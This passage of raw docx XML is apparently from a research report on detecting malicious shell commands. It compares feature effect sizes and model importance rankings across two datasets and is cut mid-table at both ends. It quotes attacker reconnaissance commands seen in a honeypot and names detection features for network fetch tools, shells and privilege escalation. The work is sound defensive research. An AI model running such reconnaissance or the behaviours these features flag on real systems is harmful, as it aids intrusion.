                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n_flags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+0.051</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−0.125</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.176</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_dev_null</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+0.143</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−0.004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.147</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>b64_run_len</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+0.102</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−0.032</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.134</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>head_is_privesc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−0.012</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+0.065</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.077</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The top four are all measures of size and verbosity, and they invert for a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>reason that is a fact about corpus construction rather than about attackers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Dataset 1 sets long generated payloads and multi-stage catalogue one-liners</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>against short documentation examples, so "malicious commands are longer" is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>true there. Dataset 2 sets terse honeypot reconnaissance (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>uname -a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cd /tmp</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat /proc/cpuinfo</w:t>
      </w:r>
      <w:r>
        <w:t>) against real user history full of long interactive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>pipelines, so the same statement is false there — and measurably so. A detector</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>tuned on Dataset 1's length signal is not merely uninformed about Dataset 2, it</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>is actively miscalibrated against it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Effect shift II: the signal is weaker everywhere on Dataset 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Sign is not the only thing that moves. Aggregated over all 43 features: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statistic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dataset 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dataset 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>mean \</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>effect\</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0867</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0617</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>strongest single feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.452 (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n_abs_paths</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.234 (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>digit_ratio</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>features with \</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>effect\</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>≥ 0.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>solo-rule features beating the 0.400 floor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The two 43-length effect-size vectors correlate at Pearson </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = 0.317</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>(Spearman 0.307) — barely related. Operational data simply carries less</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>per-feature signal than curated data, which is consistent with the labelling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>premise in Chapter 1.1: Dataset 2's malicious class contains real attacker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>reconnaissance that is genuinely indistinguishable, in isolation, from</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>administration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Importance shift: the models learn different features</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The consequence surfaces in Chapter 4's importance ranking, which combines</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Random Forest MDI, XGBoost gain and permutation importance into a consensus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>rank per dataset. Across the two corpora that consensus ranking correlates at</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Spearman 0.596 / Kendall τ 0.417</w:t>
      </w:r>
      <w:r>
        <w:t>, and the top of the list barely overlaps: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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dataset 1 top 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dataset 2 top 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n_abs_paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_fetch_bin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_shell_bin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n_abs_paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n_pipes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>head_is_privesc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_dev_null</w:t>
            </w:r>
          </w:p>
